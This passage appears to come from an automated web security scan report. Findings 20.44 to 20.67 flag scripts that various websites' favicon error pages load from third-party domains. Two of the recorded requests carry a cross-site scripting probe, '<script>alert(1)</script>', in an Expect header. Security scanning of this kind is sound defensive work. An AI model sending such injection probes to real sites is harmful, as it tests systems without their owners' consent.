Last-Modified: Tue, 03 May 2011 10:16:22 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 29175
Vary: Accept-Encoding
Cache-Control: public, max-age=960
Expires: Tue, 03 May 2011 10:32:22 GMT
Date: Tue, 03 May 2011 10:16:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=iscinteractive&pub=iscinteractive"></script>
...[SNIP]...

20.44. http://www.mrclean.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mrclean.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://js.revsci.net/gateway/gw.js?csid=F09828

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mrclean.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 //favicon.ico
Date: Tue, 03 May 2011 10:25:22 GMT
Content-Type: text/html;charset=utf-8
Cache-Control: max-age=86400
Expires: Wed, 04 May 2011 10:25:22 GMT
Vary: Accept-Encoding
Connection: close
Content-Length: 1158

<html><head><title>Apache Tomcat/5.5.26 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...
</h3><script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...

20.45. http://www.mylovedanal.tv/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mylovedanal.tv
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://img.seekandsee.com/js/perlover_srch.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mylovedanal.tv
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.20
Date: Tue, 03 May 2011 10:22:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 8777
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Last-Modified: Tue, 03 May 2011 10:22:44 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>The requested document was not found - My Loved Anal Videos</title>
<!--
...[SNIP]...
</SCRIPT>
<script src="http://img.seekandsee.com/js/perlover_srch.js"></script>
...[SNIP]...

20.46. http://www.mylovedasses.tv/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mylovedasses.tv
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://img.seekandsee.com/js/perlover_srch.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mylovedasses.tv
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.20
Date: Tue, 03 May 2011 11:18:43 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 8711
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Last-Modified: Tue, 03 May 2011 11:18:43 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>The requested document was not found - My Loved Asses Videos</title>
<!-
...[SNIP]...
</SCRIPT>
<script src="http://img.seekandsee.com/js/perlover_srch.js"></script>
...[SNIP]...

20.47. http://www.mylovedrubber.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mylovedrubber.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://img.seekandsee.com/js/perlover_srch.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mylovedrubber.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.20
Date: Tue, 03 May 2011 11:40:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 8641
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Last-Modified: Tue, 03 May 2011 11:40:12 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>The requested document was not found - My Loved Rubber Pictures</title>

...[SNIP]...
</SCRIPT>
<script src="http://img.seekandsee.com/js/perlover_srch.js"></script>
...[SNIP]...

20.48. http://www.mysubtitles.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mysubtitles.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mysubtitles.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 03 May 2011 10:41:19 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 14232

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<link rel="shortcu
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

20.49. http://www.mytoolstore.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mytoolstore.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

http://static.addtoany.com/menu/page.js
http://www.statcounter.com/counter/counter.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mytoolstore.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:40:23 GMT
Server: Apache
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43080

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404 File Not
...[SNIP]...
</a>
<script type="text/javascript" src="http://static.addtoany.com/menu/page.js"></script>
...[SNIP]...
</script>

<script type="text/javascript"
src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...

20.50. http://www.nationnews.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationnews.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://img.video.ap.org/inline/js/swfobject.js
http://img.video.ap.org/qainline/js/apInline.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nationnews.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Tue, 03 May 2011 11:25:57 GMT
Vary: Accept-Encoding
imagetoolbar: no
Content-Type: text/html; charset=utf-8
Content-Length: 20362
Date: Tue, 03 May 2011 11:27:09 GMT
X-Varnish: 1781753286 1781750354
Age: 72
Via: 1.1 varnish
Connection: keep-alive
X-Cache: Hit
X-Cache-Hits: 6

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www.nationnews.com/css/facebox.css" media="screen" />

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://img.video.ap.org/inline/js/swfobject.js"></script>
<script type="text/javascript" src="http://img.video.ap.org/qainline/js/apInline.js"></script>
...[SNIP]...

20.51. http://www.netfit.co.uk/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netfit.co.uk
Path:	/favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

http://click.adpaths.co.uk/www/delivery/spcjs.php?id=2&target=_blank
http://netfit.uk.intellitxt.com/intellitxt/front.asp?ipid=12453
http://www.google-analytics.com/urchin.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.netfit.co.uk
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:27:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 13466

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<TITLE>404 error - mi
...[SNIP]...
</SCRIPT>
<script type='text/javascript' src='http://click.adpaths.co.uk/www/delivery/spcjs.php?id=2&target=_blank'></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://netfit.uk.intellitxt.com/intellitxt/front.asp?ipid=12453"></script>

<script src="http://www.google-analytics.com/urchin.js"
type="text/javascript"></script>
...[SNIP]...

20.52. http://www.newholdonsecurity.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.newholdonsecurity.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://as.casalemedia.com/sd?s=95308&f=1

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.newholdonsecurity.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:52:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 60321

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
www.ne
...[SNIP]...
</script>
<script language="javascript" src="http://as.casalemedia.com/sd?s=95308&f=1"></script>
...[SNIP]...

20.53. http://www.playingforchange.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.playingforchange.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://w.sharethis.com/button/sharethis.js
http://widgets.twimg.com/j/2/widget.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.playingforchange.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 10:19:02 GMT
Server: Apache/2.2.15 (EL)
X-Powered-By: PHP/5.2.13
Status: 404 Not Found
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html lang="en">
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
   <titl
...[SNIP]...
<DIV id="TwitterContent" style="position:absolute; visibility: hidden;z-index:255; border: 0px solid orange; background-color: black; width:250px; padding:15px;">
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=effbf579-dfc9-4d9c-8078-ab3bad42118e&type=website&post_services=facebook%2Cdigg%2Cdelicious%2Cybuzz%2Ctwitter%2Cstumbleupon%2Creddit%2Ctechnorati%2Cmixx%2Cblogger%2Ctypepad%2Cwordpress%2Cgoogle_bmarks%2Cwindows_live%2Cmyspace%2Cfark%2Cbus_exchange%2Cpropeller%2Cnewsvine%2Clinkedin"></script>
...[SNIP]...

20.54. http://www.prettynylonfeet.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.prettynylonfeet.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

http://promo.neondollars.com/cloud/?nats=040309;4059:revshare:neoncams&filter=1,2,3,7,8,9&wldomain=0&source=vod&tagnum=40&width=auto&style=1
http://static.awempire.com/Scripts/AC_RunActiveContent.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.prettynylonfeet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:20:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 3291
Connection: close
Content-Type: text/html; charset=UTF-8

CTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Page not found</title>
<meta http-equiv="Content-Type" content="text/html; chars
...[SNIP]...

<script src="http://static.awempire.com/Scripts/AC_RunActiveContent.js" type="text/javascript"></script>
...[SNIP]...
<div style="width:745px; border:3px solid #0066FF;">
<script type="text/javascript" src="http://promo.neondollars.com/cloud/?nats=040309;4059:revshare:neoncams&filter=1,2,3,7,8,9&wldomain=0&source=vod&tagnum=40&width=auto&style=1"></script>
...[SNIP]...

20.55. http://www.prosolutionpills.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.prosolutionpills.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3/jquery.min.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.prosolutionpills.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

20.56. http://www.rb-hosting.de/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rb-hosting.de
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rb-hosting.de
Accept: */*
Proxy-Connection: Keep-Alive

Response

20.57. http://www.restaurantrow.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.restaurantrow.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

http://maps.google.com/maps?oe=utf-8&file=api&v=2.145&key=ABQIAAAAnounT8gpSdZD0rjMyJLQ_RT6sdMT_lThAjRZqA-lAkiW3ArjKhRKhlouj9Xv1NQMjJ8pCoevTW8qfA
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.restaurantrow.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Length: 29823
Content-Type: text/html
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:26:36 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>

<title>Missing Page : RestaurantRow.com</title>
<meta http-equiv="imagetoolbar" conte
...[SNIP]...
</script>
<script type="text/javascript" id="gmaps_js" src="http://maps.google.com/maps?oe=utf-8&file=api&v=2.145&key=ABQIAAAAnounT8gpSdZD0rjMyJLQ_RT6sdMT_lThAjRZqA-lAkiW3ArjKhRKhlouj9Xv1NQMjJ8pCoevTW8qfA"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

20.58. http://www.ricedelman.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ricedelman.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://content.mkt51.net/lp/static/js/iMAWebCookie.js?5b4ec310-12d29ebfa3a-37c504b367ce64f028215bda5330c1de&h=www.pages05.net

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ricedelman.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:04:41 GMT
Server: Apache/2.0.52 (CentOS)
Content-Language: en-US
Set-Cookie: JSESSIONID=aUKOOEVRxacdjFaI1_; path=/
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 9008

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>404 Error Page | Ric Edelman</title>
<meta name="description" content="F
...[SNIP]...
</div>

<script src="http://content.mkt51.net/lp/static/js/iMAWebCookie.js?5b4ec310-12d29ebfa3a-37c504b367ce64f028215bda5330c1de&h=www.pages05.net"type="text/javascript"></script>
...[SNIP]...

20.59. http://www.rv-clubs.us/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rv-clubs.us
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rv-clubs.us
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:46:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 10671

<HTML>
<HEAD>
<TITLE>RV Clubs - 404 Page Not Found Error</TITLE>
<META name="Keywords" content="rv clubs, rv links">
<META name="Description" content="RV Website 404 Page Not Found Error links">

...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

20.60. http://www.sanfranrecruiter.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sanfranrecruiter.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

http://kona.kontera.com/javascript/lib/KonaLibInline.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://scripts.chitika.net/eminimalls/amm.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sanfranrecruiter.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:28:33 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=e936f5c72d5d23dec3d2dfe1cf7f0da6; path=/
Content-Type: text/html
Content-Length: 97758

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>San Francisco Jobs, San Francisco California jobs, San Francisco jobs</title>
<meta name="keywords" conten
...[SNIP]...
</script>
           <script type='text/javascript' src='http://pagead2.googlesyndication.com/pagead/show_ads.js'></script>
...[SNIP]...
</script>
           <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script src='http://scripts.chitika.net/eminimalls/amm.js' type='text/javascript'>
</script>
...[SNIP]...
</script>
           <script type='text/javascript' src='http://pagead2.googlesyndication.com/pagead/show_ads.js'></script>
...[SNIP]...
</script>
           <script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'></script>
...[SNIP]...
</script>
           <script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'></script>
...[SNIP]...
</script>
           <script type='text/javascript' src='http://pagead2.googlesyndication.com/pagead/show_ads.js'></script>
...[SNIP]...

20.61. http://www.schoolexpress.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.schoolexpress.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://edge.quantserve.com/quant.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.schoolexpress.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:30:12 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23927

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

20.62. http://www.sharethatboy.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sharethatboy.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://www.statcounter.com/counter/counter.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sharethatboy.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

20.63. http://www.simplybestcoupons.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.simplybestcoupons.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.simplybestcoupons.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:43:49 GMT
Content-Length: 9589

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns:og="http://ogp.me/ns#" xmlns:fb="http://developers.facebook.com/sch
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/Styles/sbc.css"><script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

20.64. http://www.socializr.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.socializr.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.socializr.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 /favicon.ico
Cache-Control: private
Content-Type: text/html;charset=ISO-8859-1
Date: Tue, 03 May 2011 11:09:05 GMT
Server: Commodore 64 HTTPD
Content-Length: 7734

<!DOCTYPE HTML PUBLI
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

20.65. http://www.specialops.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.specialops.org
Path:	/favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/yui/2.8.1/build/container/container-min.js
http://ajax.googleapis.com/ajax/libs/yui/2.8.1/build/dragdrop/dragdrop-min.js
http://ajax.googleapis.com/ajax/libs/yui/2.8.1/build/json/json-min.js
http://ajax.googleapis.com/ajax/libs/yui/2.8.1/build/yahoo-dom-event/yahoo-dom-event.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.specialops.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; Charset=utf-8
Set-Cookie: ASPSession=Buffer=1304406113&Owner=C; path=/
Set-Cookie: ASPSESSIONIDCCABSDAQ=IONDIJPBBKCHCALJFCHEHKNL; path=/
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:01:54 GMT
Set-Cookie: apvc=saas307; Path=/
Content-Length: 19555
Connection: Keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
   <head>
       <title>Special Operations Warrior Foundation</title>
<meta name="robots" content="all">
<meta name="verify
...[SNIP]...


       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/yui/2.8.1/build/yahoo-dom-event/yahoo-dom-event.js"></script>
       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/yui/2.8.1/build/dragdrop/dragdrop-min.js"></script>
       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/yui/2.8.1/build/container/container-min.js"></script>
       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/yui/2.8.1/build/json/json-min.js"></script>
       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

20.66. http://www.squirt-disgrace.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.squirt-disgrace.net
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://s10.histats.com/js9.js

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.squirt-disgrace.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:17:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.17
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 9116

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title>Squirt Disgrace - BDSM Squirting</title>

<link rel="stylesheet" href=
...[SNIP]...
</a>
<script type="text/javascript" language="javascript" src="http://s10.histats.com/js9.js"></script>
...[SNIP]...

20.67. http://www.stopsacidreflux.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stopsacidreflux.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

http://server4.web-stat.com/connection_count.pl?al172859:3:
http://server4.web-stat.com/wtslog.js

Request

GET /favicon.ico HTTP/1.1
